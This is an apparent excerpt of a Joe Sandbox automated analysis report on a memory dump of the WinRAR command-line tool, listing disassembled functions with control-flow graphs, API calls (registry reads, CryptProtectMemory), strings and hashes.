7ff7d7a04214-7ff7d7a0425c 732->737 738 7ff7d7a043d0-7ff7d7a043e0 call 7ff7d7a0a580 732->738 739 7ff7d7a045a3-7ff7d7a045d4 call 7ff7d7a03884 735->739 740 7ff7d7a0458b-7ff7d7a0458f 735->740 742 7ff7d7a04531-7ff7d7a04539 736->742 743 7ff7d7a045db-7ff7d7a045de 736->743 744 7ff7d7a04261-7ff7d7a04264 737->744 761 7ff7d7a043e6-7ff7d7a04414 call 7ff7d7a0a9e8 call 7ff7d7a2172c 738->761 762 7ff7d7a044f0-7ff7d7a04503 738->762 739->743 740->739 746 7ff7d7a04591-7ff7d7a04597 740->746 749 7ff7d7a04573-7ff7d7a0457a 742->749 750 7ff7d7a0453b-7ff7d7a0453e 742->750 743->720 751 7ff7d7a045e0-7ff7d7a045e5 743->751 752 7ff7d7a04268-7ff7d7a04270 744->752 746->743 754 7ff7d7a04599-7ff7d7a045a1 746->754 763 7ff7d7a0457e-7ff7d7a04583 749->763 758 7ff7d7a04540-7ff7d7a04543 750->758 759 7ff7d7a0456a-7ff7d7a04571 750->759 751->725 752->752 760 7ff7d7a04272-7ff7d7a04288 call 7ff7d7a21700 752->760 754->743 755->756 756->652 765 7ff7d7a04545-7ff7d7a04548 758->765 766 7ff7d7a04561-7ff7d7a04568 758->766 759->763 779 7ff7d7a042a3 760->779 780 7ff7d7a0428a-7ff7d7a04295 760->780 761->762 787 7ff7d7a0441a-7ff7d7a044a9 call 7ff7d7a0d840 call 7ff7d7a0a900 call 7ff7d7a0a8c4 call 7ff7d7a0a900 call 7ff7d7a215fc 761->787 762->728 763->743 771 7ff7d7a0454a-7ff7d7a0454d 765->771 772 7ff7d7a04558-7ff7d7a0455f 765->772 766->763 771->746 777 7ff7d7a0454f-7ff7d7a04556 771->777 772->763 777->763 782 7ff7d7a042a7-7ff7d7a042be 779->782 780->779 785 7ff7d7a04297-7ff7d7a042a1 780->785 782->744 788 7ff7d7a042c0-7ff7d7a042c2 782->788 785->782 823 7ff7d7a044bf-7ff7d7a044cf 787->823 824 7ff7d7a044ab-7ff7d7a044bb 787->824 790 7ff7d7a042e6 788->790 791 7ff7d7a042c4-7ff7d7a042d6 call 7ff7d7a0a900 788->791 790->738 794 7ff7d7a042ec 790->794 796 7ff7d7a042db-7ff7d7a042e1 791->796 797 7ff7d7a042f1-7ff7d7a042f7 794->797 799 7ff7d7a045d6 796->799 800 7ff7d7a04300-7ff7d7a04303 797->800 801 7ff7d7a042f9-7ff7d7a042fe 797->801 799->743 800->797 801->800 803 7ff7d7a04305-7ff7d7a04314 801->803 805 7ff7d7a04316-7ff7d7a04320 803->805 806 7ff7d7a0433d-7ff7d7a04347 803->806 808 7ff7d7a04323-7ff7d7a04327 805->808 809 7ff7d7a0434d-7ff7d7a04378 call 7ff7d7a0d840 806->809 810 7ff7d7a045ea-7ff7d7a045ef call 7ff7d7a1a774 806->810 808->806 814 7ff7d7a04329-7ff7d7a0433b 808->814 818 7ff7d7a0439e-7ff7d7a043cb call 7ff7d7a0470c 809->818 819 7ff7d7a0437a-7ff7d7a04399 call 7ff7d7a21764 809->819 810->720 814->806 814->808 818->796 819->796 827 7ff7d7a044d2-7ff7d7a044d8 823->827 824->823 828 7ff7d7a044eb-7ff7d7a044ee 827->828 829 7ff7d7a044da-7ff7d7a044e5 827->829 828->827 829->799 829->828
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                      • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                      • API String ID: 602362809-1645646101
                                                                                                                                                                      • Opcode ID: 042f37bf1d9aae1c410111ef79281188f45fa0ee488addf9bfa451285ac8130c
                                                                                                                                                                      • Instruction ID: b9ed9b38b39f3103a11c7a05bc2ac06c7cf9d4843070f706a8d1757a1216df8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 042f37bf1d9aae1c410111ef79281188f45fa0ee488addf9bfa451285ac8130c
                                                                                                                                                                      • Instruction Fuzzy Hash: EF22D422B1868385EB28EF29D440ABDA360FF85785FC04537EA4D576D9EF2CE906C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D4FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1405 7ff7d79d4fd0-7ff7d79d502d call 7ff7d7a1a5a0 1408 7ff7d79d502f-7ff7d79d5037 1405->1408 1409 7ff7d79d504d-7ff7d79d5055 1405->1409 1408->1409 1410 7ff7d79d5039-7ff7d79d504b call 7ff7d7a1c8a0 1408->1410 1411 7ff7d79d506e-7ff7d79d5089 call 7ff7d79f420c 1409->1411 1412 7ff7d79d5057-7ff7d79d5069 call 7ff7d79d481c 1409->1412 1410->1409 1410->1412 1418 7ff7d79d509f-7ff7d79d50b6 call 7ff7d7a0db08 1411->1418 1419 7ff7d79d508b-7ff7d79d509d call 7ff7d7a0a9c0 1411->1419 1412->1411 1424 7ff7d79d511b-7ff7d79d5131 call 7ff7d7a1c8a0 1418->1424 1425 7ff7d79d50b8-7ff7d79d50c3 call 7ff7d7a0a59c 1418->1425 1419->1424 1430 7ff7d79d5203-7ff7d79d520d call 7ff7d7a0aa48 1424->1430 1431 7ff7d79d5137-7ff7d79d513e 1424->1431 1425->1424 1432 7ff7d79d50c5-7ff7d79d50cf call 7ff7d79e3054 1425->1432 1440 7ff7d79d5212-7ff7d79d521c 1430->1440 1433 7ff7d79d5140-7ff7d79d5167 call 7ff7d79f3f98 1431->1433 1434 7ff7d79d516c-7ff7d79d51be call 7ff7d7a0aa1c call 7ff7d7a0aa48 call 7ff7d7a06e98 1431->1434 1432->1424 1441 7ff7d79d50d1-7ff7d79d5107 call 7ff7d7a0a9e8 call 7ff7d7a0a9c0 call 7ff7d79e3054 1432->1441 1433->1434 1489 7ff7d79d51d3-7ff7d79d51e8 call 7ff7d7a07a24 1434->1489 1443 7ff7d79d5222 1440->1443 1444 7ff7d79d52db-7ff7d79d52e0 1440->1444 1441->1424 1516 7ff7d79d5109-7ff7d79d5116 call 7ff7d7a0a9e8 1441->1516 1449 7ff7d79d532f-7ff7d79d5332 1443->1449 1450 7ff7d79d5228-7ff7d79d522d 1443->1450 1445 7ff7d79d5453-7ff7d79d5477 call 7ff7d79df00c call 7ff7d79df230 call 7ff7d79df09c 1444->1445 1446 7ff7d79d52e6-7ff7d79d52e9 1444->1446 1507 7ff7d79d547c-7ff7d79d5483 1445->1507 1454 7ff7d79d52ef-7ff7d79d52f2 1446->1454 1455 7ff7d79d5379-7ff7d79d5382 1446->1455 1452 7ff7d79d5334 1449->1452 1453 7ff7d79d533b-7ff7d79d533e 1449->1453 1450->1449 1458 7ff7d79d5233-7ff7d79d5236 1450->1458 1452->1453 1464 7ff7d79d5340 1453->1464 1465 7ff7d79d5347-7ff7d79d5358 call 7ff7d79c1230 call 7ff7d79c4858 1453->1465 1466 7ff7d79d52f4-7ff7d79d52f7 1454->1466 1467 7ff7d79d536c-7ff7d79d5374 call 7ff7d7a081cc 1454->1467 1462 7ff7d79d5388-7ff7d79d538b 1455->1462 1463 7ff7d79d5449-7ff7d79d5451 call 7ff7d79feab8 1455->1463 1459 7ff7d79d5290-7ff7d79d5299 1458->1459 1460 7ff7d79d5238-7ff7d79d523b 1458->1460 1479 7ff7d79d52b2-7ff7d79d52bd 1459->1479 1480 7ff7d79d529b-7ff7d79d529e 1459->1480 1470 7ff7d79d5274-7ff7d79d528b call 7ff7d79c1230 call 7ff7d79c48ec 1460->1470 1471 7ff7d79d523d-7ff7d79d5240 1460->1471 1475 7ff7d79d5391-7ff7d79d5397 1462->1475 1476 7ff7d79d541b-7ff7d79d5433 call 7ff7d7a0ab1c 1462->1476 1463->1507 1464->1465 1524 7ff7d79d535d 1465->1524 1466->1445 1478 7ff7d79d52fd-7ff7d79d5300 1466->1478 1467->1507 1540 7ff7d79d535e-7ff7d79d5362 call 7ff7d79c14fc 1470->1540 1471->1445 1483 7ff7d79d5246-7ff7d79d5249 1471->1483 1494 7ff7d79d540c-7ff7d79d5419 call 7ff7d79f54f8 call 7ff7d79f51e4 1475->1494 1495 7ff7d79d5399-7ff7d79d539c 1475->1495 1476->1507 1523 7ff7d79d5435-7ff7d79d5447 call 7ff7d79fbbd4 1476->1523 1478->1449 1496 7ff7d79d5302-7ff7d79d5305 1478->1496 1488 7ff7d79d52ce-7ff7d79d52d6 call 7ff7d79f55e0 1479->1488 1491 7ff7d79d52bf-7ff7d79d52c9 call 7ff7d7a0a9e8 1479->1491 1487 7ff7d79d52a0-7ff7d79d52a6 1480->1487 1480->1488 1483->1449 1499 7ff7d79d524f-7ff7d79d5252 1483->1499 1504 7ff7d79d5313-7ff7d79d531d call 7ff7d79d481c 1487->1504 1505 7ff7d79d52a8-7ff7d79d52ad call 7ff7d79d7214 1487->1505 1488->1507 1542 7ff7d79d51c0-7ff7d79d51ce call 7ff7d7a0aa48 1489->1542 1543 7ff7d79d51ea-7ff7d79d5201 call 7ff7d7a06f68 call 7ff7d79c14c0 1489->1543 1491->1488 1494->1507 1511 7ff7d79d53ef-7ff7d79d5401 call 7ff7d79d45c8 1495->1511 1512 7ff7d79d539e-7ff7d79d53a1 1495->1512 1513 7ff7d79d5322-7ff7d79d532a call 7ff7d79e67e0 1496->1513 1514 7ff7d79d5307-7ff7d79d530a 1496->1514 1499->1445 1518 7ff7d79d5258-7ff7d79d525b 1499->1518 1504->1507 1505->1507 1529 7ff7d79d5485-7ff7d79d548c call 7ff7d79d8444 1507->1529 1530 7ff7d79d5491-7ff7d79d54bc call 7ff7d7a1a610 1507->1530 1511->1494 1512->1504 1528 7ff7d79d53a7-7ff7d79d53d5 call 7ff7d79d45c8 call 7ff7d7a0ab1c 1512->1528 1513->1507 1514->1445 1515 7ff7d79d5310 1514->1515 1515->1504 1516->1424 1533 7ff7d79d526b-7ff7d79d5272 1518->1533 1534 7ff7d79d525d-7ff7d79d5260 1518->1534 1523->1507 1524->1540 1528->1507 1560 7ff7d79d53db-7ff7d79d53ea call 7ff7d79fba9c 1528->1560 1529->1530 1533->1488 1534->1513 1548 7ff7d79d5266 1534->1548 1555 7ff7d79d5367 1540->1555 1542->1489 1543->1440 1548->1515 1555->1507 1560->1507
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr
                                                                                                                                                                      • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                      • API String ID: 1497570035-1281034975
                                                                                                                                                                      • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                      • Instruction ID: aa337ab5f8c43cf777643fff5c7aa467dd26546ac349347de949bb186f7e8e74
                                                                                                                                                                      • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 62C1C763A0C58390EA24BE34C99A5FC9251AF4679DFDC4033DA4E4A5DADEACE503C331
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A07F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1564 7ff7d7a07f24-7ff7d7a07f5c 1565 7ff7d7a07fd0 1564->1565 1566 7ff7d7a07f5e-7ff7d7a07f64 1564->1566 1568 7ff7d7a07fd7-7ff7d7a07fea 1565->1568 1566->1565 1567 7ff7d7a07f66-7ff7d7a07f7c call 7ff7d7a0b3f0 1566->1567 1578 7ff7d7a07fb5 1567->1578 1579 7ff7d7a07f7e-7ff7d7a07fb3 GetProcAddressForCaller GetProcAddress 1567->1579 1570 7ff7d7a08036-7ff7d7a08039 1568->1570 1571 7ff7d7a07fec-7ff7d7a07fef 1568->1571 1573 7ff7d7a0805c-7ff7d7a08065 GetCurrentProcessId 1570->1573 1574 7ff7d7a0803b-7ff7d7a0804a 1570->1574 1571->1573 1575 7ff7d7a07ff1-7ff7d7a08000 1571->1575 1576 7ff7d7a08077-7ff7d7a08093 1573->1576 1577 7ff7d7a08067 1573->1577 1584 7ff7d7a0804f-7ff7d7a08051 1574->1584 1585 7ff7d7a08005-7ff7d7a08007 1575->1585 1581 7ff7d7a08069-7ff7d7a08075 1577->1581 1582 7ff7d7a07fbc-7ff7d7a07fce 1578->1582 1579->1582 1581->1576 1581->1581 1582->1568 1584->1576 1586 7ff7d7a08053-7ff7d7a0805a 1584->1586 1585->1576 1587 7ff7d7a08009 1585->1587 1588 7ff7d7a08010-7ff7d7a08034 call 7ff7d79dca6c call 7ff7d79dcda4 call 7ff7d79dca40 1586->1588 1587->1588 1588->1576
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                      • API String ID: 1389829785-2207617598
                                                                                                                                                                      • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                      • Instruction ID: 9aaf6e13fb566eb9e5d2681a6728bbaaeafa0232ab259d5f8865e3177538c8e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                      • Instruction Fuzzy Hash: 45415A25A08A5385EA09AF6AA840D7DABA1BF85BD5FC84533CC1D17798DE7CE4438320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A1B0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 552178382-0
                                                                                                                                                                      • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                      • Instruction ID: ee58b8745832834798fcbdc25b0d02150e4d55f1055006038e3e7f2c649035c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                      • Instruction Fuzzy Hash: 62314C21E0C28381FA1CBB6CA451BBD9392AFC5784FC55437EE4D4B6D3DE2CA8068671
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A04774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF7D7A0495D,?,?,?,00007FF7D79F7E7D), ref: 00007FF7D7A047DB
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF7D7A0495D,?,?,?,00007FF7D79F7E7D), ref: 00007FF7D7A04831
                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF7D7A0495D,?,?,?,00007FF7D79F7E7D), ref: 00007FF7D7A04853
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7D7A0495D,?,?,?,00007FF7D79F7E7D), ref: 00007FF7D7A048A6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                      • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                      • API String ID: 1800380464-3408810217
                                                                                                                                                                      • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                      • Instruction ID: 03e043b3292d453e96e3778764b4401153f7d3dcd444e4806c85fceb5a443d3f
                                                                                                                                                                      • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                      • Instruction Fuzzy Hash: D831B522718A8241EB24EB65E8146BEA351FFC5795FC04532EE4D47B99EE6CD106C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79F4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F43D1
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F4402
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F440D
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F443E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                      • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                      • API String ID: 3617018055-3415417297
                                                                                                                                                                      • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                      • Instruction ID: 31e79356552cfc9adfe9b179ea9840c184fa643644289f3545adf1ef84d87c70
                                                                                                                                                                      • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D116023A1874286EB15AF66E4005AEF3A1FF85BD8FC45132EA4E07A65DF3CD146C750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C7A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
